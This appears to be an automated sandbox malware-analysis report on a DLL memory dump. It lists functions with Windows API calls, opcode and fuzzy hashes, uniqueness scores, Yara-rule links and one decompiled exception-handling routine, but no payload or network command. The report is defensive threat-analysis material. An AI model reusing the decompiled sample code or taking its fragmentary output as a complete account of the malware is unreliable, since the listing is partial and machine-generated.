0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 6E1B2536

Memory Dump Source

Source File: 00000001.00000002.473919285.000000006E1B1000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: true

Associated: 00000001.00000002.473904553.000000006E1B0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.473937407.000000006E1B3000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.473949206.000000006E1B5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.473959359.000000006E1B6000.00000002.00020000.sdmp Download File

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: 33be65914d3a3d3ed20393ac98059d9f8948df03c011f682750ade0823a39e9f
Instruction ID: 1a8a32d126e06400d8e30b6f88a057b0c77500d95ed4735254a6316e7566e542
Opcode Fuzzy Hash: 33be65914d3a3d3ed20393ac98059d9f8948df03c011f682750ade0823a39e9f
Instruction Fuzzy Hash: BE61E570B146028FDB59CFA9D4B079A73B9AB96314F30C479D825CB694F730D8CAEA50

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DBA6F, Relevance: 1.7, APIs: 1, Instructions: 191COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e49467af60e203f1157a6954c4e9b426e3150a325f8717d53d3d45447018f69
Instruction ID: 5e9566c531f7f92a881328519208004dada64781e373ec067f640e14c5a07f62
Opcode Fuzzy Hash: 8e49467af60e203f1157a6954c4e9b426e3150a325f8717d53d3d45447018f69
Instruction Fuzzy Hash: 2C51D4B580421DAFDB14DFA9CC98EEAB7BDEF45304F24469DE41AD3204EA319E849B50

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E4D06, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 6E1D7990: GetLastError.KERNEL32(00000000,0000FFFF,00000004,6E1C2130,0000FFFF,?,0000FFFF,?,6E1D665B,00000000,0000FFFF,?,?,00000000,?), ref: 6E1D7995
Part of subcall function 6E1D7990: SetLastError.KERNEL32(00000000,6E27E108,000000FF,?,6E1D665B,00000000,0000FFFF,?,?,00000000,?), ref: 6E1D7A33

EnumSystemLocalesW.KERNEL32(6E1E4E2C,00000001,00000000,?,-00000050,?,6E1E545A,00000000,?,?,?,00000055,?), ref: 6E1E4D78

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: fcaa578fa9af17069e7aff2827f0c20a32cbed5cfd346e4f1ae8bb2ddc545bfc
Instruction ID: cf454a179d37c716afbeb7856277b47fc4f6f6c9cb158ca57de27b2ce9fc4fac
Opcode Fuzzy Hash: fcaa578fa9af17069e7aff2827f0c20a32cbed5cfd346e4f1ae8bb2ddc545bfc
Instruction Fuzzy Hash: 93114C3B214B055FDB089FB9D8915BAB7A2FF80368B19482CE94787B40D3717583D740

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E4DA1, Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

Part of subcall function 6E1D7990: GetLastError.KERNEL32(00000000,0000FFFF,00000004,6E1C2130,0000FFFF,?,0000FFFF,?,6E1D665B,00000000,0000FFFF,?,?,00000000,?), ref: 6E1D7995
Part of subcall function 6E1D7990: SetLastError.KERNEL32(00000000,6E27E108,000000FF,?,6E1D665B,00000000,0000FFFF,?,?,00000000,?), ref: 6E1D7A33

EnumSystemLocalesW.KERNEL32(6E1E507F,00000001,00000000,?,-00000050,?,6E1E541E,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 6E1E4DEB

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 7c5bb92c4db77263466502d5aaf757c0cb89c26e478ae01fbb836aa2ec87708c
Instruction ID: ccbd77b6f734ee64e98bf1139a301e3588536cbae0e625b0838b6bebe1e157b8
Opcode Fuzzy Hash: 7c5bb92c4db77263466502d5aaf757c0cb89c26e478ae01fbb836aa2ec87708c
Instruction Fuzzy Hash: 8BF0F676200B055FDB149FB9D884ABA7BA6FF80368B15442DF9468BA80C771A882E750

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DDD84, Relevance: 1.5, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 6E1DB164: RtlEnterCriticalSection.NTDLL(?), ref: 6E1DB173

EnumSystemLocalesW.KERNEL32(6E1DDD77,00000001), ref: 6E1DDDBC

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 73d732e6e427801fdc68e75a28f2bf9595a58e25e40a9f8302a144438aea1d4a
Instruction ID: 6cb0d93b31db348c3931845f2cb57410bddbaf03ac3ff6642a1d3f44fdb159d1
Opcode Fuzzy Hash: 73d732e6e427801fdc68e75a28f2bf9595a58e25e40a9f8302a144438aea1d4a
Instruction Fuzzy Hash: B9F0A9B2A04614EFEF00DFA8D404B9E77F1EB09724F10455AE411DB290CB744984DF60

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E4C9D, Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 6E1D7990: GetLastError.KERNEL32(00000000,0000FFFF,00000004,6E1C2130,0000FFFF,?,0000FFFF,?,6E1D665B,00000000,0000FFFF,?,?,00000000,?), ref: 6E1D7995
Part of subcall function 6E1D7990: SetLastError.KERNEL32(00000000,6E27E108,000000FF,?,6E1D665B,00000000,0000FFFF,?,?,00000000,?), ref: 6E1D7A33

EnumSystemLocalesW.KERNEL32(6E1E4BF6,00000001,00000000,?,?,6E1E547C,-00000050,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 6E1E4CD4

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 20d502532c022df2c41732d755758c128039b00eadb40497d0f29620e2ef49f8
Instruction ID: 6c99c0ffc2795f50bc5ccdf758b90f7d74a358b7deb188b569be91a6f4cfc954
Opcode Fuzzy Hash: 20d502532c022df2c41732d755758c128039b00eadb40497d0f29620e2ef49f8
Instruction Fuzzy Hash: 3EF0A03A20064557DB04AB7AC84966A7BA4EFC1724B5A4459FA0A8B651C6319883E7A0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DE7A7, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,6E1D9B48,?,20001004,00000000,00000002,?,?,6E1D8EA9), ref: 6E1DE7DB

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 8bf9afc11e07ba558f334d3c3558e5fa8c20a19a3f71c90076edcf7b3bd6dbad
Instruction ID: bc90c7c0ee6b0afe8aaec389c6b6cd60045164e2948f0ee96317984f3a211123
Opcode Fuzzy Hash: 8bf9afc11e07ba558f334d3c3558e5fa8c20a19a3f71c90076edcf7b3bd6dbad
Instruction Fuzzy Hash: 41E04F72941529FBCF126FA1CC08ADEBF1AEF55B62F054410FD04A6151CB328A65FAE4

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DDE84, Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32(Function_0001FD77,00000001), ref: 6E1DDE9E

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 7be3472baaac77a4a1d5f7b884292d721367fa43ae00e7ee659f4957c817aa05
Instruction ID: 3a9f464119964631bfcc4c45eb24a4b4fb943ff824b097125cb42dc85d1b456d
Opcode Fuzzy Hash: 7be3472baaac77a4a1d5f7b884292d721367fa43ae00e7ee659f4957c817aa05
Instruction Fuzzy Hash: EFD0A7B1408B14BFEF006F61C80D9573B6BE341350B100019F50947350DBB158C0CA64

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DDE5B, Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32(Function_0001FD77,00000001), ref: 6E1DDE71

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 2e2306e965ca33b254083e7f43dc3a1957eff522598647a87ae28b9e6880a6b5
Instruction ID: a10710fc3c00a25bb1f3c2c90b9beaf138f415d27adb0cfcfcc35970071871f3
Opcode Fuzzy Hash: 2e2306e965ca33b254083e7f43dc3a1957eff522598647a87ae28b9e6880a6b5
Instruction Fuzzy Hash: B5D0C9B0504B10AFEF05AF60C44D9563762F7063047200559F1128B6A0CBB118C0DF25

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D25F2, Relevance: 1.5, Strings: 1, Instructions: 243COMMON

Download Yara Rule

Strings

0, xrefs: 6E1D2799

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: f7b968d63f6022d013da3af7bac03a185c404e4baf55d267e94fe730ee11910d
Instruction ID: fd71037077e53ea5a289f951405cee96751b7eee8f4442cf273970dbaa46d009
Opcode Fuzzy Hash: f7b968d63f6022d013da3af7bac03a185c404e4baf55d267e94fe730ee11910d
Instruction Fuzzy Hash: 646179707407065ADB68CFE844A07BE73A9AB72704F60082ED972DB2D0D76199CEF715

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D2119, Relevance: 1.5, Strings: 1, Instructions: 243COMMON

Download Yara Rule

Strings

0, xrefs: 6E1D22C0

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 2eb90187159ddd3341f1736108750b73937b39c1c811b07d924670920835ae5d
Instruction ID: 81024742c3aaff80945408f15c71740c1d6014a97029b05a3a539686440e8ae3
Opcode Fuzzy Hash: 2eb90187159ddd3341f1736108750b73937b39c1c811b07d924670920835ae5d
Instruction Fuzzy Hash: 2C61AF30640206A6DF54CBE84CA07BE73A9EB65744F60881EE672DB284D7619ECEF351

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D1EB4, Relevance: 1.5, Strings: 1, Instructions: 239COMMON

Download Yara Rule

Strings

0, xrefs: 6E1D204C

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 44404ed89313b44b2e82857d6baf54ad9ac1914b5400fca35904e5395de49582
Instruction ID: ee4e4e79973e3cc0d04a1065693142d374c2ed55a388eb2cc22795178e1e2248
Opcode Fuzzy Hash: 44404ed89313b44b2e82857d6baf54ad9ac1914b5400fca35904e5395de49582
Instruction Fuzzy Hash: B561897074030A5ADB54CBE889A07FE73A9AB62704F604A1EE562DB280D765DDCEF301

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D238D, Relevance: 1.5, Strings: 1, Instructions: 239COMMON

Download Yara Rule

Strings

0, xrefs: 6E1D2525

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 2ea15dc8a6400f93a08bf324d995b7f9b540e7edb15625d885e16f1bcc2f3e11
Instruction ID: 0fbc16f6f3c2aef4e72f1eefbde56d83c4f54c2f77ff5ca1a63a9af99f5de95f
Opcode Fuzzy Hash: 2ea15dc8a6400f93a08bf324d995b7f9b540e7edb15625d885e16f1bcc2f3e11
Instruction Fuzzy Hash: 13617D70740206AADB55CBD888B0BFE7365EF66704F20091AE872DB284E761D9CEF711

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D1C73, Relevance: 1.5, Strings: 1, Instructions: 220COMMON

Download Yara Rule

Strings

0, xrefs: 6E1D1DFE

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 4517ca94957e5fbd95d4aa2e1ca3bf0dac0da862de54335163f63256c36e39ad
Instruction ID: 3935dbe7dc00a48c88571df96b83b95eaa426cd1f27723b7d68875eccd8ac54f
Opcode Fuzzy Hash: 4517ca94957e5fbd95d4aa2e1ca3bf0dac0da862de54335163f63256c36e39ad
Instruction Fuzzy Hash: F6519B70744A4A5ADB658AE888A47EF77EEAB23308F600919C4D2D7381C7119ECDF302

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D1800, Relevance: 1.5, Strings: 1, Instructions: 220COMMON

Download Yara Rule

Strings

0, xrefs: 6E1D198B

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 303ec94b304a1ae0f72fb86f9c149d79fe13b0dbe0fe127470b7d989762d23d1
Instruction ID: 3958971f8e38f43b68e58f89c37389180425fb12bf7c2ff632887988f6f0e878
Opcode Fuzzy Hash: 303ec94b304a1ae0f72fb86f9c149d79fe13b0dbe0fe127470b7d989762d23d1
Instruction Fuzzy Hash: 75516B707446469AEB58C9E984E07EEB7AF9B23308F20099DD493D7284C715EADDF342

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D1A41, Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 6E1D1BBD

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 233b60815e95fafd34584134dd10ad10052128c725cf15bd5c0870b33977e10d
Instruction ID: bb8682c746465bdc47d4c3c137840a3907d09ff9981f8c9262e9ba92918addb7
Opcode Fuzzy Hash: 233b60815e95fafd34584134dd10ad10052128c725cf15bd5c0870b33977e10d
Instruction Fuzzy Hash: E051BE3034468A5EDB6489E985A07EE77AEBF63304F60091ED842C7290E7159DCDF342

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D15CE, Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 6E1D174A

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 00b8fa07e1b12afe9a89b174ce377186814ee0a7e1e3c682ba4aad773602876b
Instruction ID: 7edc6c441886847ae4383ff53cb07056ec4cc84a44a2921d270cceba0772b483
Opcode Fuzzy Hash: 00b8fa07e1b12afe9a89b174ce377186814ee0a7e1e3c682ba4aad773602876b
Instruction Fuzzy Hash: A451DD707446495BDB948AF885E07EE77AE9B22304F24091ED472CB292C7919DCEF701

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DED89, Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 6E1DED89

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 4399646a57c14f0cc308e33d8ba2bb1076bc36c8fb0e7e77405ed945376cbeec
Instruction ID: ec86d38f15271dd26dde4031ac29aa59c1c71c9dfa26bd37449e450184682bef
Opcode Fuzzy Hash: 4399646a57c14f0cc308e33d8ba2bb1076bc36c8fb0e7e77405ed945376cbeec
Instruction Fuzzy Hash: E6A012B0109610CF5F008E32860D20A36966D0718030840149004C5120D6304040C611

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C248F, Relevance: .5, Instructions: 468COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 265194d1ef695c3bcb0089519dc1960e7f9b870e0991599a85d0a2aa415c8baf
Instruction ID: 94fe24927408f9e255c08545758dd18f71cdf3717861bd537dbd3bd743861152
Opcode Fuzzy Hash: 265194d1ef695c3bcb0089519dc1960e7f9b870e0991599a85d0a2aa415c8baf
Instruction Fuzzy Hash: DE02A371A006258FDB65CF98C890B9AB7F8BB2A704F1054EAD949E7244E734DEC0DF52

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C5F80, Relevance: .4, Instructions: 375COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a98986c2624a6836d7fa33a931a9ea0e07fadf73085188304d73231f72e9aeaa
Instruction ID: a4f58a8205918f43f36827d2782a1a8694fa79d1a149c6ad97d178c05c2e89f0
Opcode Fuzzy Hash: a98986c2624a6836d7fa33a931a9ea0e07fadf73085188304d73231f72e9aeaa
Instruction Fuzzy Hash: 25E19671A102288FDB65CF98CC90BEAB3B8FF96B04F1400E9D549E7245D7349E859F92

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C5B50, Relevance: .3, Instructions: 259COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a636a9744e134bee1bcd010db8872b5f2bbde06428ef20d69c0fad9b2ddccdf7
Instruction ID: 85e6f3c3aa7dee024068cdfb6e91528709a52b60f350943c387b041af205d823
Opcode Fuzzy Hash: a636a9744e134bee1bcd010db8872b5f2bbde06428ef20d69c0fad9b2ddccdf7
Instruction Fuzzy Hash: 5F91A371A002698BCB20CF98C8907DDB7B5FF99704F6540EAD909EB244E7749E819F82

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C3163, Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f2776fcba9cf6b82569017f6ee8c7b525b198590eaf1d9cb24b22986793dc68
Instruction ID: 67dbd43d1d501137270d956785a0cf294560ae9f19c26b79fb4e6ebb8da284fa
Opcode Fuzzy Hash: 6f2776fcba9cf6b82569017f6ee8c7b525b198590eaf1d9cb24b22986793dc68
Instruction Fuzzy Hash: 01519371E00119EFDF04CF99C954AEEBBB2EF98304F198099E405AB241C7359E92DB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E325A, Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92f7e09a2dde214a8f4a059c58633e8a1cbb07926a7f44c392d322c10218c649
Instruction ID: f03b8f57d29b04ebecebc037bf804f76e81e9010725f6404ba5292b08ec8b5ca
Opcode Fuzzy Hash: 92f7e09a2dde214a8f4a059c58633e8a1cbb07926a7f44c392d322c10218c649
Instruction Fuzzy Hash: 1221B673F20839477B0CC47E8C562BDB6E1C68C541745423AF8A6EA2C1E968D917E2E4

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E313A, Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eaf6c4500c414952e29e02b13ab649e47ff955043467a382fb45461adfbaf9e6
Instruction ID: 2792cc0a88f75c6d97028769e4c33db015bc24d191756d43b065e9e58bc25aeb
Opcode Fuzzy Hash: eaf6c4500c414952e29e02b13ab649e47ff955043467a382fb45461adfbaf9e6
Instruction Fuzzy Hash: D0118A23F30C255B775C81AD8C172AA95D2DBD825070F533ED826E7384E9A4DE13D290

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B2264, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E6E1B2264(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E6E1B23CB(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E6E1B2485(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E6E1B2370(_t55, _t66);
										_t89 = _t66 + 0x10;
										E6E1B23CB(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E6E1B2467(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x6e1b2268
0x6e1b2269
0x6e1b226a
0x6e1b226d
0x6e1b226f
0x6e1b2272
0x6e1b2273
0x6e1b2275
0x6e1b2276
0x6e1b2277
0x6e1b227a
0x6e1b2284
0x6e1b2335
0x6e1b233c
0x6e1b2345
0x6e1b228a
0x6e1b228a
0x6e1b2290
0x6e1b2296
0x6e1b2299
0x6e1b229c
0x6e1b22a0
0x6e1b22a5
0x6e1b22aa
0x6e1b232a
0x00000000
0x6e1b22ac
0x6e1b22ac
0x6e1b22b8
0x6e1b22ba
0x6e1b2315
0x6e1b2315
0x6e1b231b
0x00000000
0x6e1b22bc
0x6e1b22cb
0x6e1b22cd
0x6e1b22ce
0x6e1b22cf
0x6e1b22d2
0x6e1b22d2
0x6e1b22d4
0x00000000
0x6e1b22d6
0x6e1b22d6
0x6e1b2320
0x6e1b22d8
0x6e1b22d8
0x6e1b22dc
0x6e1b22e4
0x6e1b22e9
0x6e1b22ee
0x6e1b22fa
0x6e1b2302
0x6e1b2309
0x6e1b230f
0x6e1b2313
0x00000000
0x6e1b2313
0x6e1b22d6
0x6e1b22d4
0x00000000
0x6e1b22ba
0x6e1b232e
0x6e1b232e
0x6e1b232e
0x6e1b22aa
0x6e1b234a
0x6e1b2351

Memory Dump Source

Source File: 00000001.00000002.473919285.000000006E1B1000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: true

Associated: 00000001.00000002.473904553.000000006E1B0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.473937407.000000006E1B3000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.473949206.000000006E1B5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.473959359.000000006E1B6000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction ID: bfdf800ad8cf455026106de81ea5aad39958e512eee5b16b4ae97b83520e01f5
Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction Fuzzy Hash: 0921C832900205DFCB10DFA9C8C09ABB7A9FF4D350B4685A8D915DB255D730F959DBE0

Uniqueness

Uniqueness Score: -1.00%

Function 6E2805A7, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.474652266.000000006E280000.00000040.00020000.sdmp, Offset: 6E280000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction ID: 44e562bb180bc055b209818cd74ac3afebc18e97273c9aeb0df305b600c2c1e4
Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction Fuzzy Hash: AC1181733411059FE754CF99DC90E97739AFB89230B298066ED18CB345E73AE845C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 6E2809A0, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.474652266.000000006E280000.00000040.00020000.sdmp, Offset: 6E280000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
Instruction ID: 31fb4047e31dffb8136e6f3276691e3780c10ad82f9b6f3559e7c11ddb910b83
Opcode Fuzzy Hash: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
Instruction Fuzzy Hash: 5701227235624A8FF704CB6DD990E6AB7E9EBC5720F05807EC90683655E130E849C920

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DB429, Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6ef712250403953984e6c358644c22428868e87fbeb485884ec1b6d0f8cb7ac
Instruction ID: 11aa9e9b5bdebece9a6aa21b20eeafd6729edac70a7683e76eb89d5f0f1879cb
Opcode Fuzzy Hash: c6ef712250403953984e6c358644c22428868e87fbeb485884ec1b6d0f8cb7ac
Instruction Fuzzy Hash: 75F09032664224DBDE13CADCC514F95B3A8EB0AB10F614055E653DB258C7B4DE84E7C0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DB260, Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c91ab9362258cfa92972890fe5e1e2594a2156eb58101d70c7c6f27824e8a8b3
Instruction ID: d99df605298d29e438724b7b830ff689e18881ceda9b6785c31a00ff7b41040a
Opcode Fuzzy Hash: c91ab9362258cfa92972890fe5e1e2594a2156eb58101d70c7c6f27824e8a8b3
Instruction Fuzzy Hash: E1F09032654205EFDB42CEEDC555F4E77E8EB06744F204451E516DB648D634EE88E700

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DB370, Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51b861b9e5bee0e3fa27092f625242a3df20ff55b659d94a79fbed7d7b77933e
Instruction ID: 8f433ff3c3445351a614154d39acf088a76481d81352786bec9e61dec7183c49
Opcode Fuzzy Hash: 51b861b9e5bee0e3fa27092f625242a3df20ff55b659d94a79fbed7d7b77933e
Instruction Fuzzy Hash: 53F03031E25324ABCB16DA88C445F8AB3BDEB49B55F214056E501DB144C370DE44EBD0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DB3B4, Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
